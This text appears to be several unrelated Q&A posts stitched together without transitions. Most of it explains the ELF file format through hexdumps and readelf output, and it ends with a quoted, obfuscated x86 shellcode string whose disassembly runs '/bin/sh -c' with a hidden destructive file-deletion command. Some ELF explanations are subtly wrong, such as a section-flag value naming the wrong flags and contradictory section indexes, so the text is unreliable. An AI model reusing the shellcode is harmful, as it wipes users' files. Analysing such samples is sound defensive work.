In index 0, SHT_NULL is mandatory. Are there any other uses for it: What is the use of the SHT_NULL section in ELF? ?
.data section
.data is section 1:
00000080 01 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |................|
000000a0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
80 0: sh_name = 01 00 00 00: index 1 in the .shstrtab string table
Here, 1 says the name of this section starts at the first character of that section, and ends at the first NUL character, making up the string .data.
.data is one of the section names which has a predefined meaning http://www.sco.com/developers/gabi/2003-12-17/ch4.strtab.html
These sections hold initialized data that contribute to the program's memory image.
80 4: sh_type = 01 00 00 00: SHT_PROGBITS: the section content is not specified by ELF, only by how the program interprets it. Normal since a .data section.
80 8: sh_flags = 03 7x 00: SHF_ALLOC and SHF_EXECINSTR: http://www.sco.com/developers/gabi/2003-12-17/ch4.sheader.html#sh_flags, as required from a .data section
90 0: sh_addr = 8x 00: in what virtual address the section will be placed during execution, 0 if not placed
90 8: sh_offset = 00 02 00 00 00 00 00 00 = 0x200: number of bytes from the start of the program to the first byte in this section
a0 0: sh_size = 0d 00 00 00 00 00 00 00
If we take 0xD bytes starting at sh_offset 200, we see:
00000200 48 65 6c 6c 6f 20 77 6f 72 6c 64 21 0a 00 |Hello world!.. |
AHA! So our "Hello world!" string is in the data section like we told it to be on the NASM.
Once we graduate from hd, we will look this up like:
readelf -x .data hello_world.o
which outputs:
Hex dump of section '.data':
0x00000000 48656c6c 6f20776f 726c6421 0a Hello world!.
NASM sets decent properties for that section because it treats .data magically: http://www.nasm.us/doc/nasmdoc7.html#section-7.9.2
Also note that this was a bad section choice: a good C compiler would put the string in .rodata instead, because it is read-only and it would allow for further OS optimizations.
a0 8: sh_link and sh_info = 8x 0: do not apply to this section type. http://www.sco.com/developers/gabi/2003-12-17/ch4.sheader.html#special_sections
b0 0: sh_addralign = 04 = TODO: why is this alignment necessary? Is it only for sh_addr, or also for symbols inside sh_addr?
b0 8: sh_entsize = 00 = the section does not contain a table. If != 0, it means that the section contains a table of fixed size entries. In this file, we see from the readelf output that this is the case for the .symtab and .rela.text sections.
.text section
Now that we've done one section manually, let's graduate and use the readelf -S of the other sections.
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 2] .text PROGBITS 0000000000000000 00000210
0000000000000027 0000000000000000 AX 0 0 16
.text is executable but not writable: if we try to write to it Linux segfaults. Let's see if we really have some code there:
objdump -d hello_world.o
gives:
hello_world.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: b8 01 00 00 00 mov $0x1,%eax
5: bf 01 00 00 00 mov $0x1,%edi
a: 48 be 00 00 00 00 00 movabs $0x0,%rsi
11: 00 00 00
14: ba 0d 00 00 00 mov $0xd,%edx
19: 0f 05 syscall
1b: b8 3c 00 00 00 mov $0x3c,%eax
20: bf 00 00 00 00 mov $0x0,%edi
25: 0f 05 syscall
If we grep b8 01 00 00 on the hd, we see that this only occurs at 00000210, which is what the section says. And the Size is 27, which matches as well. So we must be talking about the right section.
This looks like the right code: a write followed by an exit.
The most interesting part is line a which does:
movabs $0x0,%rsi
to pass the address of the string to the system call. Currently, the 0x0 is just a placeholder. After linking happens, it will be modified to contain:
4000ba: 48 be d8 00 60 00 00 movabs $0x6000d8,%rsi
This modification is possible because of the data of the .rela.text section.
SHT_STRTAB
Sections with sh_type == SHT_STRTAB are called string tables.
They hold a null separated array of strings.
Such sections are used by other sections when string names are to be used. The using section says:
which string table they are using
what is the index on the target string table where the string starts
So for example, we could have a string table containing: TODO: does it have to start with \0?
Data: \0 a b c \0 d e f \0
Index: 0 1 2 3 4 5 6 7 8
And if another section wants to use the string d e f, they have to point to index 5 of this section (letter d).
Notable string table sections:
.shstrtab
.strtab
.shstrtab
Section type: sh_type == SHT_STRTAB.
Common name: section header string table.
The section name .shstrtab is reserved. The standard says:
This section holds section names.
This section gets pointed to by the e_shstrnd field of the ELF header itself.
String indexes of this section are are pointed to by the sh_name field of section headers, which denote strings.
This section does not have SHF_ALLOC marked, so it will not appear on the executing program.
readelf -x .shstrtab hello_world.o
Gives:
Hex dump of section '.shstrtab':
0x00000000 002e6461 7461002e 74657874 002e7368 ..data..text..sh
0x00000010 73747274 6162002e 73796d74 6162002e strtab..symtab..
0x00000020 73747274 6162002e 72656c61 2e746578 strtab..rela.tex
0x00000030 7400 t.
The data in this section has a fixed format: http://www.sco.com/developers/gabi/2003-12-17/ch4.strtab.html
If we look at the names of other sections, we see that they all contain numbers, e.g. the .text section is number 7.
Then each string ends when the first NUL character is found, e.g. character 12 is \0 just after .text\0.
.symtab
Section type: sh_type == SHT_SYMTAB.
Common name: symbol table.
First the we note that:
sh_link = 5
sh_info = 6
For SHT_SYMTAB sections, those numbers mean that:
strings that give symbol names are in section 5, .strtab
the relocation data is in section 6, .rela.text
A good high level tool to disassemble that section is:
nm hello_world.o
which gives:
0000000000000000 T _start
0000000000000000 d hello_world
000000000000000d a hello_world_len
This is however a high level view that omits some types of symbols and in which the symbol types . A more detailed disassembly can be obtained with:
readelf -s hello_world.o
which gives:
Symbol table '.symtab' contains 7 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FILE LOCAL DEFAULT ABS hello_world.asm
2: 0000000000000000 0 SECTION LOCAL DEFAULT 1
3: 0000000000000000 0 SECTION LOCAL DEFAULT 2
4: 0000000000000000 0 NOTYPE LOCAL DEFAULT 1 hello_world
5: 000000000000000d 0 NOTYPE LOCAL DEFAULT ABS hello_world_len
6: 0000000000000000 0 NOTYPE GLOBAL DEFAULT 2 _start
The binary format of the table is documented at http://www.sco.com/developers/gabi/2003-12-17/ch4.symtab.html
The data is:
readelf -x .symtab hello_world.o
Which gives:
Hex dump of section '.symtab':
0x00000000 00000000 00000000 00000000 00000000 ................
0x00000010 00000000 00000000 01000000 0400f1ff ................
0x00000020 00000000 00000000 00000000 00000000 ................
0x00000030 00000000 03000100 00000000 00000000 ................
0x00000040 00000000 00000000 00000000 03000200 ................
0x00000050 00000000 00000000 00000000 00000000 ................
0x00000060 11000000 00000100 00000000 00000000 ................
0x00000070 00000000 00000000 1d000000 0000f1ff ................
0x00000080 0d000000 00000000 00000000 00000000 ................
0x00000090 2d000000 10000200 00000000 00000000 -...............
0x000000a0 00000000 00000000 ........
The entries are of type:
typedef struct {
Elf64_Word st_name;
unsigned char st_info;
unsigned char st_other;
Elf64_Half st_shndx;
Elf64_Addr st_value;
Elf64_Xword st_size;
} Elf64_Sym;
Like in the section table, the first entry is magical and set to a fixed meaningless values.
STT_FILE
Entry 1 has ELF64_R_TYPE == STT_FILE. ELF64_R_TYPE is continued inside of st_info.
Byte analysis:
10 8: st_name = 01000000 = character 1 in the .strtab, which until the following \0 makes hello_world.asm
This piece of information file may be used by the linker to decide on which segment sections go.
10 12: st_info = 04
Bits 0-3 = ELF64_R_TYPE = Type = 4 = STT_FILE: the main purpose of this entry is to use st_name to indicate the name of the file which generated this object file.
Bits 4-7 = ELF64_ST_BIND = Binding = 0 = STB_LOCAL. Required value for STT_FILE.
10 13: st_shndx = Symbol Table Section header Index = f1ff = SHN_ABS. Required for STT_FILE.
20 0: st_value = 8x 00: required for value for STT_FILE
20 8: st_size = 8x 00: no allocated size
Now from the readelf, we interpret the others quickly.
STT_SECTION
There are two such entries, one pointing to .data and the other to .text (section indexes 1 and 2).
Num: Value Size Type Bind Vis Ndx Name
2: 0000000000000000 0 SECTION LOCAL DEFAULT 1
3: 0000000000000000 0 SECTION LOCAL DEFAULT 2
TODO what is their purpose?
STT_NOTYPE
Then come the most important symbols:
Num: Value Size Type Bind Vis Ndx Name
4: 0000000000000000 0 NOTYPE LOCAL DEFAULT 1 hello_world
5: 000000000000000d 0 NOTYPE LOCAL DEFAULT ABS hello_world_len
6: 0000000000000000 0 NOTYPE GLOBAL DEFAULT 2 _start
hello_world string is in the .data section (index 1). It's value is 0: it points to the first byte of that section.
_start is marked with GLOBAL visibility since we wrote:
global _start
in NASM. This is necessary since it must be seen as the entry point. Unlike in C, by default NASM labels are local.
SHN_ABS
hello_world_len points to the special st_shndx == SHN_ABS == 0xF1FF.
0xF1FF is chosen so as to not conflict with other sections.
st_value == 0xD == 13 which is the value we have stored there on the assembly: the length of the string Hello World!.
This means that relocation will not affect this value: it is a constant.
This is small optimization that our assembler does for us and which has ELF support.
If we had used the address of hello_world_len anywhere, the assembler would not have been able to mark it as SHN_ABS, and the linker would have extra relocation work on it later.
SHT_SYMTAB on the executable
By default, NASM places a .symtab on the executable as well.
This is only used for debugging. Without the symbols, we are completely blind, and must reverse engineer everything.
You can strip it with objcopy, and the executable will still run. Such executables are called stripped executables.
.strtab
Holds strings for the symbol table.
This section has sh_type == SHT_STRTAB.
It is pointed to by sh_link == 5 of the .symtab section.
readelf -x .strtab hello_world.o
Gives:
Hex dump of section '.strtab':
0x00000000 0068656c 6c6f5f77 6f726c64 2e61736d .hello_world.asm
0x00000010 0068656c 6c6f5f77 6f726c64 0068656c .hello_world.hel
0x00000020 6c6f5f77 6f726c64 5f6c656e 005f7374 lo_world_len._st
0x00000030 61727400 art.
This implies that it is an ELF level limitation that global variables cannot contain NUL characters.
.rela.text
Section type: sh_type == SHT_RELA.
Common name: relocation section.
.rela.text holds relocation data which says how the address should be modified when the final executable is linked. This points to bytes of the text area that must be modified when linking happens to point to the correct memory locations.
Basically, it translates the object text containing the placeholder 0x0 address:
a: 48 be 00 00 00 00 00 movabs $0x0,%rsi
11: 00 00 00
to the actual executable code containing the final 0x6000d8:
4000ba: 48 be d8 00 60 00 00 movabs $0x6000d8,%rsi
4000c1: 00 00 00
It was pointed to by sh_info = 6 of the .symtab section.
readelf -r hello_world.o gives:
Relocation section '.rela.text' at offset 0x3b0 contains 1 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000000000c 000200000001 R_X86_64_64 0000000000000000 .data + 0
The section does not exist in the executable.
The actual bytes are:
00000370 0c 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 |................|
00000380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
The struct represented is:
typedef struct {
Elf64_Addr r_offset;
Elf64_Xword r_info;
Elf64_Sxword r_addend;
} Elf64_Rela;
So:
370 0: r_offset = 0xC: address into the .text whose address this relocation will modify
370 8: r_info = 0x200000001. Contains 2 fields:
ELF64_R_TYPE = 0x1: meaning depends on the exact architecture.
ELF64_R_SYM = 0x2: index of the section to which the address points, so .data which is at index 2.
The AMD64 ABI says that type 1 is called R_X86_64_64 and that it represents the operation S + A where:
S: the value of the symbol on the object file, here 0 because we point to the 00 00 00 00 00 00 00 00 of movabs $0x0,%rsi
A: the addend, present in field r_added
This address is added to the section on which the relocation operates.
This relocation operation acts on a total 8 bytes.
380 0: r_addend = 0
So in our example we conclude that the new address will be: S + A = .data + 0, and thus the first thing in the data section.
Program header table
Only appears in the executable.
Contains information of how the executable should be put into the process virtual memory.
The executable is generated from object files by the linker. The main jobs that the linker does are:
determine which sections of the object files will go into which segments of the executable.
In Binutils, this comes down to parsing a linker script, and dealing with a bunch of defaults.
You can get the linker script used with ld --verbose, and set a custom one with ld -T.
do relocation on text sections. This depends on how the multiple sections are put into memory.
readelf -l hello_world.out gives:
Elf file type is EXEC (Executable file)
Entry point 0x4000b0
There are 2 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x00000000000000d7 0x00000000000000d7 R E 200000
LOAD 0x00000000000000d8 0x00000000006000d8 0x00000000006000d8
0x000000000000000d 0x000000000000000d RW 200000
Section to Segment mapping:
Segment Sections...
00 .text
01 .data
On the ELF header, e_phoff, e_phnum and e_phentsize told us that there are 2 program headers, which start at 0x40 and are 0x38 bytes long each, so they are:
00000040 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 |..#.......#.....|
00000060 d7 00 00 00 00 00 00 00 d7 00 00 00 00 00 00 00 |................|
00000070 00 00 20 00 00 00 00 00 |.. ..... |
and:
00000070 01 00 00 00 06 00 00 00 | ........|
00000080 d8 00 00 00 00 00 00 00 d8 00 60 00 00 00 00 00 |..........`.....|
00000090 d8 00 60 00 00 00 00 00 0d 00 00 00 00 00 00 00 |..`.............|
000000a0 0d 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 |.......... .....|
Structure represented http://www.sco.com/developers/gabi/2003-12-17/ch5.pheader.html:
typedef struct {
Elf64_Word p_type;
Elf64_Word p_flags;
Elf64_Off p_offset;
Elf64_Addr p_vaddr;
Elf64_Addr p_paddr;
Elf64_Xword p_filesz;
Elf64_Xword p_memsz;
Elf64_Xword p_align;
} Elf64_Phdr;
Breakdown of the first one:
40 0: p_type = 01 00 00 00 = PT_LOAD: TODO. I think it means it will be actually loaded into memory. Other types may not necessarily be.
40 4: p_flags = 05 00 00 00 = execute and read permissions, no write TODO
40 8: p_offset = 8x 00 TODO: what is this? Looks like offsets from the beginning of segments. But this would mean that some segments are intertwined? It is possible to play with it a bit with: gcc -Wl,-Ttext-segment=0x400030 hello_world.c
50 0: p_vaddr = 00 00 40 00 00 00 00 00: initial virtual memory address to load this segment to
50 8: p_paddr = 00 00 40 00 00 00 00 00: initial physical address to load in memory. Only matters for systems in which the program can set it's physical address. Otherwise, as in System V like systems, can be anything. NASM seems to just copy p_vaddrr
60 0: p_filesz = d7 00 00 00 00 00 00 00: TODO vs p_memsz
60 8: p_memsz = d7 00 00 00 00 00 00 00: TODO
70 0: p_align = 00 00 20 00 00 00 00 00: 0 or 1 mean no alignment required TODO what does that mean? otherwise redundant with other fields
The second is analogous.
Then the:
Section to Segment mapping:
section of the readelf tells us that:
0 is the .text segment. Aha, so this is why it is executable, and not writable
1 is the .data segment.
As mentioned in my comment, you will essentially be writing your own elf-header for the executable eliminating the unneeded sections. There are still several required sections. The documentation at Muppetlabs-TinyPrograms does a fair job explaining this process. For fun, here are a couple of examples:
The equivalent of /bin/true (45 bytes):
00000000 7F 45 4C 46 01 00 00 00 00 00 00 00 00 00 49 25 |.ELF..........I%|
00000010 02 00 03 00 1A 00 49 25 1A 00 49 25 04 00 00 00 |......I%..I%....|
00000020 5B 5F F2 AE 40 22 5F FB CD 80 20 00 01 |[_..#"_... ..|
0000002d
Your classic 'Hello World!' (160 bytes):
00000000 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 03 00 01 00 00 00 74 80 04 08 34 00 00 00 |........t...4...|
00000020 00 00 00 00 00 00 00 00 34 00 20 00 02 00 28 00 |........4. ...(.|
00000030 00 00 00 00 01 00 00 00 74 00 00 00 74 80 04 08 |........t...t...|
00000040 74 80 04 08 1f 00 00 00 1f 00 00 00 05 00 00 00 |t...............|
00000050 00 10 00 00 01 00 00 00 93 00 00 00 93 90 04 08 |................|
00000060 93 90 04 08 0d 00 00 00 0d 00 00 00 06 00 00 00 |................|
00000070 00 10 00 00 b8 04 00 00 00 bb 01 00 00 00 b9 93 |................|
00000080 90 04 08 ba 0d 00 00 00 cd 80 b8 01 00 00 00 31 |...............1|
00000090 db cd 80 48 65 6c 6c 6f 20 77 6f 72 6c 64 21 0a |...Hello world!.|
000000a0
Don't forget to make them executable...
I have noticed a command in the form of hex characters and it says this is a hex version of a command (Linux) , what does it actually mean by hex version , How can i convert this to human readable form .
As of now i know :
\ : as an escape sequence
x : stands for HEX
the command is listed below...
"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
But how can i convert this to the original command in English like "XXXXXXXX " .
I took that binary and ran it through hexdump -vC and objdump:
$ objdump -b binary -m i386 -D output
output: file format binary
Disassembly of section .data:
00000000 <.data>:
0: eb 3e jmp 0x40
2: 5b pop %ebx
3: 31 c0 xor %eax,%eax
5: 50 push %eax
6: 54 push %esp
7: 5a pop %edx
8: 83 ec 64 sub $0x64,%esp
b: 68 ff ff ff ff push $0xffffffff
10: 68 df d0 df d9 push $0xd9dfd0df
15: 68 8d 99 df 81 push $0x81df998d
1a: 68 8d 92 df d2 push $0xd2df928d
1f: 54 push %esp
20: 5e pop %esi
21: f7 16 notl (%esi)
23: f7 56 04 notl 0x4(%esi)
26: f7 56 08 notl 0x8(%esi)
29: f7 56 0c notl 0xc(%esi)
2c: 83 c4 74 add $0x74,%esp
2f: 56 push %esi
30: 8d 73 08 lea 0x8(%ebx),%esi
33: 56 push %esi
34: 53 push %ebx
35: 54 push %esp
36: 59 pop %ecx
37: b0 0b mov $0xb,%al
39: cd 80 int $0x80
3b: 31 c0 xor %eax,%eax
3d: 40 inc %eax
3e: eb f9 jmp 0x39
40: e8 bd ff ff ff call 0x2
45: 2f das
46: 62 69 6e bound %ebp,0x6e(%ecx)
49: 2f das
4a: 73 68 jae 0xb4
4c: 00 .byte 0x0
4d: 2d .byte 0x2d
4e: 63 00 arpl %ax,(%eax)
...
$ hexdump -vC output
00000000 eb 3e 5b 31 c0 50 54 5a 83 ec 64 68 ff ff ff ff |.>[1.PTZ..dh....|
00000010 68 df d0 df d9 68 8d 99 df 81 68 8d 92 df d2 54 |h....h....h....T|
00000020 5e f7 16 f7 56 04 f7 56 08 f7 56 0c 83 c4 74 56 |^...V..V..V...tV|
00000030 8d 73 08 56 53 54 59 b0 0b cd 80 31 c0 40 eb f9 |.s.VSTY....1.#..|
00000040 e8 bd ff ff ff 2f 62 69 6e 2f 73 68 00 2d 63 00 |...../bin/sh.-c.|
00000050 00 |.|
00000051
It does look like some kind of program. First it jumps to offset 0x40 and then uses call 0x2 to set the stack up; then a bunch of operations including a system call. Program data appears to start at offset 0x45 and contains the string "/bin/sh -c".
The system call in question is #11 (mov $0xb,%al), which according to this table is sys_execve. I'd guess it's trying to run a shell. Is this code intended to exploit buffer overflows?